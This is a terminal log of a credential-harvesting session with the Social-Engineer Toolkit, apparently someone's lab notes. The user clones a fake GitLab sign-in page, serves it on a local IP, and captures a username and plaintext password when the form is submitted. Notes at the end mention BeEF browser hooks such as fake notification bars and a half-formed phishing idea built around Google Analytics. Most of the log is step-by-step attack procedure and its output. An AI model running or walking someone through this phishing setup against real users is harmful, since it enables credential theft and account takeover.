                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).                                                                     
         The one stop shop for all of your SE needs.                                                                      
                                                                                                                          
   The Social-Engineer Toolkit is a product of TrustedSec.                                                                
                                                                                                                          
           Visit: https://www.trustedsec.com                                                                              
                                                                                                                          
   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!                                                         
                                                                                                                          
                                                                                                                          
 Unable to check for new version of SET (is your network up?)
                                                                                                                          
 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

>> 1


          !\_________________________/!\
          !!                         !! \
          !! Social-Engineer Toolkit !!  \
          !!                         !!  !
          !!          Free           !!  !
          !!                         !!  !
          !!          #hugs          !!  !
          !!                         !!  !
          !!      By: TrustedSec     !!  /
          !!_________________________!! /
          !/_________________________\!/
             __\_________________/__/!_
            !_______________________!/
          ________________________
         /oooo  oooo  oooo  oooo /!
        /ooooooooooooooooooooooo/ /
       /ooooooooooooooooooooooo/ /
      /C=_____________________/_/

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.                                                                
                                                                                                                          
           Visit: https://www.trustedsec.com                                                                              
                                                                                                                          
   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!                                                         
                                                                                                                          
                                                                                                                          
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

>>> 2

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

>>>> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

>>>>> 3

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this 
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really 
important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.97.4]:192.168.97.4
[!] Example: /home/website/ (make sure you end with /)
[!] Also note that there MUST be an index.html in the folder you point to.
set:webattack> Path to the website to be cloned:/home/zawmoehtike/Downloads/gitlab-fake/

1. Copy just the index.html
2. Copy the entire folder

>>>>>> 2

[-] Example: http://www.blah.com
set:webattack> URL of the website you imported:

"Open ip_address (192.168.97.4) in target browser and submit"
"Wait in terminal from hacker machine"
"You will get credentials of zawmoehtike"

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.                                                                                                            
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                            
[*] Information will be displayed to you as it arrives below:                                                             
192.168.97.3 - - [06/Jun/2021 11:00:14] "GET / HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:00:15] "GET /e2216a7e9b73f5cb0279351c78ce61c33475cea7.gif HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:00:15] "GET /application-c5635015bed5bc1d572558840f8b24a5888a8ef2560bf4de5800dc7165defd51.css HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:00:16] "GET /favicon-7901bd695fb93edb07975966062049829afb56cf11511236e61bcf425070e36e.png HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:00:16] "GET /application_utilities-0ddca4d8c6df56558cc462315a481fd490f410149e4434ce02ad8b58b51badd7.css HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:00:16] "GET /white-3dc16a1a591e4b4ebf0a3b185f2a92790dada139f107cde1bcb5fa03a563b0c6.css HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:01:14] "GET / HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:01:14] "GET /application-c5635015bed5bc1d572558840f8b24a5888a8ef2560bf4de5800dc7165defd51.css HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:01:14] "GET /e2216a7e9b73f5cb0279351c78ce61c33475cea7.gif HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:01:15] "GET /application_utilities-0ddca4d8c6df56558cc462315a481fd490f410149e4434ce02ad8b58b51badd7.css HTTP/1.1" 200 -
192.168.97.3 - - [06/Jun/2021 11:01:15] "GET /white-3dc16a1a591e4b4ebf0a3b185f2a92790dada139f107cde1bcb5fa03a563b0c6.css HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: authenticity_token=KVb/djBg+lkeOmwK7kwuSnLKs1xEAZgJ+5Kf6llEB/RK1lciqwV56nLoX0ygou4dUnTQ4x9SUvvZi0XPPCLfBg==        
POSSIBLE USERNAME FIELD FOUND: user[login]=zawmoehtike                                                                    
POSSIBLE USERNAME FIELD FOUND: user[password]=pwddwp111                                                                   
POSSIBLE PASSWORD FIELD FOUND: user[password]=pwddwp111                                                                   
POSSIBLE USERNAME FIELD FOUND: user[remember_me]=0                                                                        
POSSIBLE USERNAME FIELD FOUND: user[remember_me]=1                                                                        
PARAM: commit=Sign+in                                                                                                     
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                                                             
                                                                                                                          
                                                                                                                          
192.168.97.3 - - [06/Jun/2021 11:01:31] "POST /sign_in HTTP/1.1" 302 -
192.168.97.3 - - [06/Jun/2021 11:01:57] "GET /favicon.ico HTTP/1.1" 404 -

BeEf
----
"BeEf is Browser Exploitation framework"
> beef-xss

"Go command tab"

"Find - alert, redirect, Clippy, Fake Notification Bar, Social Engineering"

Indirect - Google Analytics - Setoolkit
---------------------------------------
- Go youtube page, view page source, take google analytic data
- Open Setoolkit in Kali


























